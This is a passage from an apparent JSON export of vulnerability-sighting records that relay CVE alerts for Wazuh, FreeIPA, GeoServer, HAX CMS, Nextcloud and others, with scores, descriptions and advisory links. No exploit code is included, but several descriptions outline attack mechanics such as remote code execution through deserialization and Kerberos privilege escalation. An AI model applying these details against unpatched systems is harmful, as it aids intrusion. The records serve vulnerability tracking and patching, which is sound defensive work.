patched in version 1.2.46.\n\ud83d\udccf Published: 2025-06-24T02:56:26.589Z\n\ud83d\udccf Modified: 2025-06-24T02:56:26.589Z\n\ud83d\udd17 References:\n1. https://github.com/kanboard/kanboard/security/advisories/GHSA-2ch5-gqjm-8p92\n2. https://github.com/kanboard/kanboard/commit/bca2bd7ab95e7990e358fd35a7daf51a9c16aa75", "creation_timestamp": "2025-06-24T03:48:15.000000Z"}, {"uuid": "0e79b0b1-56c7-4a80-bed4-e74a0506dc5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF6V-W58F-V97W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18323", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49583\n\ud83d\udd25 CVSS Score: 5.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N)\n\ud83d\udd39 Description: XWiki is a generic wiki platform. When a user without script right creates a document with an `XWiki.Notifications.Code.NotificationEmailRendererClass` object, and later an admin edits and saves that document, the email templates in this object will be used for notifications. No malicious code can be executed, though, as while these templates allow Velocity code, the existing generic analyzer already warns admins before editing Velocity code. The main impact would thus be to send spam, e.g., with phishing links to other users or to hide notifications about other attacks. Note that warnings before editing documents with dangerous properties have only been introduced in XWiki 15.9, before that version, this was a known issue and the advice was simply to be careful. This has been patched in XWiki 16.10.2, 16.4.7 and 15.10.16 by adding an analysis for the respective XClass properties.\n\ud83d\udccf Published: 2025-06-13T17:04:49.975Z\n\ud83d\udccf Modified: 2025-06-13T17:04:49.975Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-ff6v-w58f-v97w\n2. https://github.com/xwiki/xwiki-platform/commit/3d96bf3ceb167bf0213d63f0be1f7e1732eb0a92\n3. https://jira.xwiki.org/browse/XWIKI-22471", "creation_timestamp": "2025-06-13T19:22:51.000000Z"}, {"uuid": "a6a180d5-c80c-4353-9d48-ecc1f36d0335", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R88-6CJ9-9FH5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17659", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48370\n\ud83d\udd25 CVSS Score: 2.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: auth-js is an isomorphic Javascript library for Supabase Auth. Prior to version 2.69.1, the library functions getUserById, deleteUser, updateUserById, listFactors and deleteFactor did not require the user supplied values to be valid UUIDs. This could lead to a URL path traversal, resulting in the wrong API function being called. Implementations that follow security best practice and validate user controlled inputs, such as the userId are not affected by this. This issue has been patched in version 2.69.1.\n\ud83d\udccf Published: 2025-05-27T15:27:00.864Z\n\ud83d\udccf Modified: 2025-05-27T15:37:18.556Z\n\ud83d\udd17 References:\n1. https://github.com/supabase/auth-js/security/advisories/GHSA-8r88-6cj9-9fh5\n2. https://github.com/supabase/auth-js/pull/1063", "creation_timestamp": "2025-05-27T15:49:17.000000Z"}, {"uuid": "7bb7acab-99b0-4d44-879c-b3230421a1ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7VCF-F5V9-3WR6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48057\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L)\n\ud83d\udd39 Description: Icinga 2 is a monitoring system which checks the availability of network resources, notifies users of outages, and generates performance data for reporting. Prior to versions 2.12.12, 2.13.12, and 2.14.6, the VerifyCertificate() function can be tricked into incorrectly treating certificates as valid. This allows an attacker to send a malicious certificate request that is then treated as a renewal of an already existing certificate, resulting in the attacker obtaining a valid certificate that can be used to impersonate trusted nodes. This only occurs when Icinga 2 is built with OpenSSL older than version 1.1.0. This issue has been patched in versions 2.12.12, 2.13.12, and 2.14.6.\n\ud83d\udccf Published: 2025-05-27T16:32:29.931Z\n\ud83d\udccf Modified: 2025-05-27T16:32:29.931Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icinga2/security/advisories/GHSA-7vcf-f5v9-3wr6\n2. https://github.com/Icinga/icinga2/commit/34c93a2542bbe4e9886d15bc17ec929ead1aa152\n3. https://github.com/Icinga/icinga2/commit/4023128be42b18a011dda71ddee9ca79955b89cb\n4. https://github.com/Icinga/icinga2/commit/60f75f4a3d5cbb234eb3694ba7e9076a1a5b8776\n5. https://github.com/Icinga/icinga2/commit/9ad5683aab9eb392c6737ff46c830a945c9e240f\n6. https://github.com/Icinga/icinga2/commit/9b2c05d0cc09210bdeade77cf9a73859250fc48d", "creation_timestamp": "2025-05-27T16:52:50.000000Z"}, {"uuid": "e5f63869-52b9-4805-b746-a989e5cdfa0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M6C2-6P3H-8JV2", "type": "seen", "source": "Telegram/HMXFp0Tl_wkMV3YbUFvnNEgjo9AC8CPiEoVa-pxPf99RdwY", "content": "", "creation_timestamp": "2026-04-21T19:25:57.000000Z"}, {"uuid": "d6bc9e50-9d11-46b5-83b9-c270d491db11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR65-6VP8-WHJF", "type": "seen", "source": "Telegram/HMXFp0Tl_wkMV3YbUFvnNEgjo9AC8CPiEoVa-pxPf99RdwY", "content": "", "creation_timestamp": "2026-04-21T19:25:57.000000Z"}, {"uuid": "0be564f7-47b9-4d61-91cb-8c6eb53cb499", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J98M-W3XP-9F56", "type": "seen", "source": "Telegram/HMXFp0Tl_wkMV3YbUFvnNEgjo9AC8CPiEoVa-pxPf99RdwY", "content": "", "creation_timestamp": "2026-04-21T19:25:57.000000Z"}, {"uuid": "3654c23d-189a-4c87-92d1-712597ef400c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RH67-4C8J-HJJH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17956", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49143\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N)\n\ud83d\udd39 Description: Nautobot is a Network Source of Truth and Network Automation Platform. Prior to v2.4.10 and v1.6.32 , files uploaded by users to Nautobot's MEDIA_ROOT directory, including DeviceType image attachments as well as images attached to a Location, Device, or Rack, are served to users via a URL endpoint that was not enforcing user authentication. As a consequence, such files can be retrieved by anonymous users who know or can guess the correct URL for a given file. Nautobot v2.4.10 and v1.6.32 address this issue by adding enforcement of Nautobot user authentication to this endpoint.\n\ud83d\udccf Published: 2025-06-10T15:43:59.225Z\n\ud83d\udccf Modified: 2025-06-10T18:12:01.967Z\n\ud83d\udd17 References:\n1. https://github.com/nautobot/nautobot/security/advisories/GHSA-rh67-4c8j-hjjh\n2. https://github.com/nautobot/nautobot/pull/6672\n3. https://github.com/nautobot/nautobot/pull/6703\n4. https://github.com/nautobot/nautobot/commit/9c892dc300429948a4714f743c9c2879d8987340\n5. https://github.com/nautobot/nautobot/commit/d99a53b065129cff3a0fa9abe7355a9ef1ad4c95", "creation_timestamp": "2025-06-10T18:33:07.000000Z"}, {"uuid": "1abcbeb5-8384-428d-9437-3d546da86999", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q8WX-2CRX-C7PP", "type": "seen", "source": "Telegram/HMXFp0Tl_wkMV3YbUFvnNEgjo9AC8CPiEoVa-pxPf99RdwY", "content": "", "creation_timestamp": "2026-04-21T19:25:57.000000Z"}, {"uuid": "908b017e-5929-48f1-bea5-9581b7380f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9194", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18594", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-4404\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A privilege escalation from host to domain vulnerability was found in the FreeIPA project. The FreeIPA package fails to validate the uniqueness of the `krbCanonicalName` for the admin account by default, allowing users to create services with the same canonical name as the REALM admin. When a successful attack happens, the user can retrieve a Kerberos ticket in the name of this service, containing the admin@REALM credential. This flaw allows an attacker to perform administrative tasks over the REALM, leading to access to sensitive data and sensitive data exfiltration.\n\ud83d\udccf Published: 2025-06-17T13:39:17.945Z\n\ud83d\udccf Modified: 2025-06-17T14:30:18.658Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9185\n2. https://access.redhat.com/errata/RHSA-2025:9187\n3. https://access.redhat.com/errata/RHSA-2025:9189\n4. https://access.redhat.com/errata/RHSA-2025:9193\n5. https://access.redhat.com/errata/RHSA-2025:9194\n6. https://access.redhat.com/security/cve/CVE-2025-4404\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2364606", "creation_timestamp": "2025-06-17T14:39:59.000000Z"}, {"uuid": "ac84d6f0-ddc7-4eb3-8b38-fb83744ae205", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9193", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18594", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-4404\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A privilege escalation from host to domain vulnerability was found in the FreeIPA project. The FreeIPA package fails to validate the uniqueness of the `krbCanonicalName` for the admin account by default, allowing users to create services with the same canonical name as the REALM admin. When a successful attack happens, the user can retrieve a Kerberos ticket in the name of this service, containing the admin@REALM credential. This flaw allows an attacker to perform administrative tasks over the REALM, leading to access to sensitive data and sensitive data exfiltration.\n\ud83d\udccf Published: 2025-06-17T13:39:17.945Z\n\ud83d\udccf Modified: 2025-06-17T14:30:18.658Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9185\n2. https://access.redhat.com/errata/RHSA-2025:9187\n3. https://access.redhat.com/errata/RHSA-2025:9189\n4. https://access.redhat.com/errata/RHSA-2025:9193\n5. https://access.redhat.com/errata/RHSA-2025:9194\n6. https://access.redhat.com/security/cve/CVE-2025-4404\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2364606", "creation_timestamp": "2025-06-17T14:39:59.000000Z"}, {"uuid": "5f150b5f-acb3-455b-9ef1-80ba8386b4b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MV55-3MGV-FXWR", "type": "seen", "source": "Telegram/HMXFp0Tl_wkMV3YbUFvnNEgjo9AC8CPiEoVa-pxPf99RdwY", "content": "", "creation_timestamp": "2026-04-21T19:25:57.000000Z"}, {"uuid": "b3030111-1b75-4a60-959f-f393e1c5ea3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2014:0414", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17877", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2013-6954\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The png_do_expand_palette function in libpng before 1.6.8 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via (1) a PLTE chunk of zero bytes or (2) a NULL palette, related to pngrtran.c and pngset.c.\n\ud83d\udccf Published: 2014-01-12T15:00:00.000Z\n\ud83d\udccf Modified: 2025-06-10T13:18:13.099Z\n\ud83d\udd17 References:\n1. https://www.ibm.com/support/docview.wss?uid=swg21675973\n2. https://access.redhat.com/errata/RHSA-2014:0414\n3. http://security.gentoo.org/glsa/glsa-201406-32.xml\n4. http://advisories.mageia.org/MGASA-2014-0075.html\n5. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/128098.html\n6. http://lists.opensuse.org/opensuse-updates/2014-01/msg00071.html\n7. http://marc.info/?l=bugtraq&amp;m=140852886808946&amp;w=2\n8. http://www-01.ibm.com/support/docview.wss?uid=swg21672080\n9. http://sourceforge.net/p/libpng/code/ci/1faa6ff32c648acfe3cf30a58d31d7aebc24968c\n10. http://www.kb.cert.org/vuls/id/650142\n11. https://access.redhat.com/errata/RHSA-2014:0413\n12. http://secunia.com/advisories/59058\n13. http://marc.info/?l=bugtraq&amp;m=140852886808946&amp;w=2\n14. http://marc.info/?l=bugtraq&amp;m=140852974709252&amp;w=2\n15. http://www.securityfocus.com/bid/64493\n16. http://secunia.com/advisories/58974\n17. http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html\n18. https://bugzilla.redhat.com/show_bug.cgi?id=1045561\n19. http://www.mandriva.com/security/advisories?name=MDVSA-2014:035\n20. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/127947.html\n21. http://marc.info/?l=bugtraq&amp;m=140852974709252&amp;w=2\n22. http://www-01.ibm.com/support/docview.wss?uid=swg21676746\n23. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/128099.html\n24. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/127952.html\n25. http://www.libpng.org/pub/png/libpng.html\n26. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/128114.html\n27. http://sourceforge.net/projects/libpng/files/libpng16/1.6.8/", "creation_timestamp": "2025-06-10T13:30:03.000000Z"}, {"uuid": "4fe15db4-9cc3-4f7b-ae57-53b61ee0fb4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3XV-6967-CV88", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18075", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-40914\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Perl CryptX before version 0.087 contains a dependency that may be susceptible to an integer overflow.\n\nCryptX embeds a version of the libtommath library that is susceptible to an integer overflow associated with CVE-2023-36328.\n\ud83d\udccf Published: 2025-06-11T14:06:53.418Z\n\ud83d\udccf Modified: 2025-06-11T14:06:53.418Z\n\ud83d\udd17 References:\n1. https://www.cve.org/CVERecord?id=CVE-2023-36328\n2. https://github.com/libtom/libtommath/pull/546\n3. https://github.com/advisories/GHSA-j3xv-6967-cv88\n4. https://metacpan.org/release/MIK/CryptX-0.086/source/src/ltm/bn_mp_grow.c", "creation_timestamp": "2025-06-11T14:31:27.000000Z"}, {"uuid": "d75738b0-37dd-4a04-ba77-1924d403e239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCRC-79HJ-M3QH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17937", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24016\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H)\n\ud83d\udd39 Description: Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix.\n\ud83d\udccf Published: 2025-02-10T19:08:09.058Z\n\ud83d\udccf Modified: 2025-06-10T17:15:40.324Z\n\ud83d\udd17 References:\n1. https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh", "creation_timestamp": "2025-06-10T17:32:27.000000Z"}, {"uuid": "0f4a998c-0e8a-487d-9e38-5f17bbb727a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2025", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17996", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10234\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly, where a user may perform Cross-site scripting in the Wildfly deployment system. This flaw allows an attacker or insider to execute a deployment with a malicious payload, which could trigger undesired behavior against the server.\n\ud83d\udccf Published: 2024-10-22T13:17:57.891Z\n\ud83d\udccf Modified: 2025-06-10T20:58:55.120Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2025\n2. https://access.redhat.com/errata/RHSA-2025:2026\n3. https://access.redhat.com/errata/RHSA-2025:2029\n4. https://access.redhat.com/security/cve/CVE-2024-10234\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2320848", "creation_timestamp": "2025-06-10T21:32:06.000000Z"}, {"uuid": "dc85c87b-9c70-4899-a2f7-2f711b4e6d2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJ54-8F66-C5PC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17910", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30220\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L)\n\ud83d\udd39 Description: GeoServer is an open source server that allows users to share and edit geospatial data. GeoTools Schema class use of Eclipse XSD library to represent schema data structure is vulnerable to XML External Entity (XXE) exploit. This impacts whoever exposes XML processing with gt-xsd-core involved in parsing, when the documents carry a reference to an external XML schema. The gt-xsd-core Schemas class is not using the EntityResolver provided by the ParserHandler (if any was configured). This also impacts users of gt-wfs-ng DataStore where the ENTITY_RESOLVER connection parameter was not being used as intended. This vulnerability is fixed in GeoTools 33.1, 32.3, 31.7, and 28.6.1, GeoServer 2.27.1, 2.26.3, and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13.\n\ud83d\udccf Published: 2025-06-10T15:16:39.339Z\n\ud83d\udccf Modified: 2025-06-10T15:16:39.339Z\n\ud83d\udd17 References:\n1. https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc\n2. https://github.com/geonetwork/core-geonetwork/security/advisories/GHSA-2p76-gc46-5fvc\n3. https://github.com/geotools/geotools/security/advisories/GHSA-826p-4gcg-35vw\n4. https://github.com/geonetwork/core-geonetwork/pull/8757\n5. https://github.com/geonetwork/core-geonetwork/pull/8803\n6. https://github.com/geonetwork/core-geonetwork/pull/8812\n7. https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities", "creation_timestamp": "2025-06-10T15:31:13.000000Z"}, {"uuid": "f0bedd99-ac3b-4c0c-8832-ca94704a01a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G9C8-WH35-G75F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17744", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-50253\n\ud83d\udd25 CVSS Score: 9.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Laf is a cloud development platform. In the Laf version design, the log uses communication with k8s to quickly retrieve logs from the container without the need for additional storage. However, in version 1.0.0-beta.13 and prior, this interface does not verify the permissions of the pod, which allows authenticated users to obtain any pod logs under the same namespace through this method, thereby obtaining sensitive information printed in the logs. As of time of publication, no known patched versions exist.\n\ud83d\udccf Published: 2024-01-03T16:45:11.778Z\n\ud83d\udccf Modified: 2025-06-09T18:48:18.796Z\n\ud83d\udd17 References:\n1. https://github.com/labring/laf/security/advisories/GHSA-g9c8-wh35-g75f\n2. https://github.com/labring/laf/pull/1468", "creation_timestamp": "2025-06-09T19:48:04.000000Z"}, {"uuid": "d684fb1e-29b8-4a20-bad0-c244639dc71f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4974-G27Q-H5M8", "type": "seen", "source": "Telegram/GomAqAKioRw5ORwyc6ugTkWhk08fHowYPUM-Q49l2oeUgi0", "content": "", "creation_timestamp": "2026-04-21T17:18:10.000000Z"}, {"uuid": "ca26e5ed-d07c-4377-9b87-995bca572613", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-48WV-JPF4-VJFV", "type": "published-proof-of-concept", "source": "Telegram/ITN0hTjNGfPMK-REHkV5qJBsGo4t4-tf1bJT5aod5DHh0UQ", "content": "", "creation_timestamp": "2026-04-21T23:30:36.000000Z"}, {"uuid": "8269acf8-5027-49bc-aaae-6d801c4c75bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4CWV-5285-63V9", "type": "seen", "source": "Telegram/WzFh75qC0rKhc-ksOtYvdTuNUy7-5M1wjcl5aTvCRw8jriM", "content": "", "creation_timestamp": "2026-04-21T23:30:49.000000Z"}, {"uuid": "a74c0a6c-a0fa-40a5-af96-f3eeefd770bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2VC4-3HX7-V7V7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17786", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49137\n\ud83d\udd25 CVSS Score: 8.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N)\n\ud83d\udd39 Description: HAX CMS PHP allows users to manage their microsite universe with a PHP backend. Prior to version 11.0.0, the application does not sufficiently sanitize user input, allowing for the execution of arbitrary JavaScript code. The 'saveNode' and 'saveManifest' endpoints take user input and store it in the JSON schema for the site. This content is then rendered in the generated HAX site. Although the application does not allow users to supply a `script` tag, it does allow the use of other HTML tags to run JavaScript. Version 11.0.0 fixes the issue.\n\ud83d\udccf Published: 2025-06-09T21:00:15.808Z\n\ud83d\udccf Modified: 2025-06-09T21:00:15.808Z\n\ud83d\udd17 References:\n1. https://github.com/haxtheweb/issues/security/advisories/GHSA-2vc4-3hx7-v7v7\n2. https://github.com/haxtheweb/haxcms-php/commit/0dd3e98fe2fadd0793b667d4af2aac230980e0f8", "creation_timestamp": "2025-06-09T21:32:03.000000Z"}, {"uuid": "7ed46f13-6149-46ae-bb66-a2ea52610ba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G3P6-82VC-43JH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17789", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48493\n\ud83d\udd25 CVSS Score: 5.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:H)\n\ud83d\udd39 Description: The Yii 2 Redis extension provides the redis key-value store support for the Yii framework 2.0. On failing connection, the extension writes commands sequence to logs. Prior to version 2.0.20, AUTH parameters are written in plain text exposing username and password. That might be an issue if attacker has access to logs. Version 2.0.20 fixes the issue.\n\ud83d\udccf Published: 2025-06-05T16:33:20.330Z\n\ud83d\udccf Modified: 2025-06-09T20:52:45.538Z\n\ud83d\udd17 References:\n1. https://github.com/yiisoft/yii2-redis/security/advisories/GHSA-g3p6-82vc-43jh\n2. https://github.com/yiisoft/yii2-redis/commit/962252d2c57c187181e67bb66da3f27b4698358d", "creation_timestamp": "2025-06-09T21:32:05.000000Z"}, {"uuid": "70d9d50e-d7fc-4d52-a74f-1627e36125f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3PH-2Q5Q-CG88", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17783", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49139\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: HAX CMS PHP allows users to manage their microsite universe with a PHP backend. Prior to version 11.0.0, in the HAX site editor, users can create a website block to load another site in an iframe. The application allows users to supply a target URL in the website block. When the HAX site is visited, the client's browser will query the supplied URL. An authenticated attacker can create a HAX site with a website block pointing at an attacker-controlled server running Responder or a similar tool. The attacker can then conduct a phishing attack by convincing another user to visit their malicious HAX site to harvest credentials. Version 11.0.0 contains a patch for the issue.\n\ud83d\udccf Published: 2025-06-09T21:08:44.391Z\n\ud83d\udccf Modified: 2025-06-09T21:08:44.391Z\n\ud83d\udd17 References:\n1. https://github.com/haxtheweb/issues/security/advisories/GHSA-v3ph-2q5q-cg88\n2. https://github.com/haxtheweb/haxcms-nodejs/commit/5368eb9b278ca47cd9a83b8d3e6216375615b8f5", "creation_timestamp": "2025-06-09T21:31:57.000000Z"}, {"uuid": "ec098b86-cd7e-4993-9015-dec49fbb7442", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F962-HW26-G267", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17888", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-48239\n\ud83d\udd25 CVSS Score: 8.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H)\n\ud83d\udd39 Description: Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. Starting in version 25.0.0 and prior to versions 25.0.13, 26.0.8, and 27.1.3 of Nextcloud Server and starting in version 20.0.0 and prior to versions 20.0.14.16, 21.0.9.13, 22.2.10.15, 23.0.12.12, 24.0.12.8, 25.0.13, 26.0.8, and 27.1.3 of Nextcloud Enterprise Server, a malicious user could update any personal or global external storage, making them inaccessible for everyone else as well. Nextcloud Server 25.0.13, 26.0.8, and 27.1.3 and Nextcloud Enterprise Server is upgraded to 20.0.14.16, 21.0.9.13, 22.2.10.15, 23.0.12.12, 24.0.12.8, 25.0.13, 26.0.8, and 27.1.3 contain a patch for this issue. As a workaround, disable app files_external. This workaround also makes the external storage inaccessible but retains the configurations until a patched version has been deployed.\n\ud83d\udccf Published: 2023-11-21T21:02:35.442Z\n\ud83d\udccf 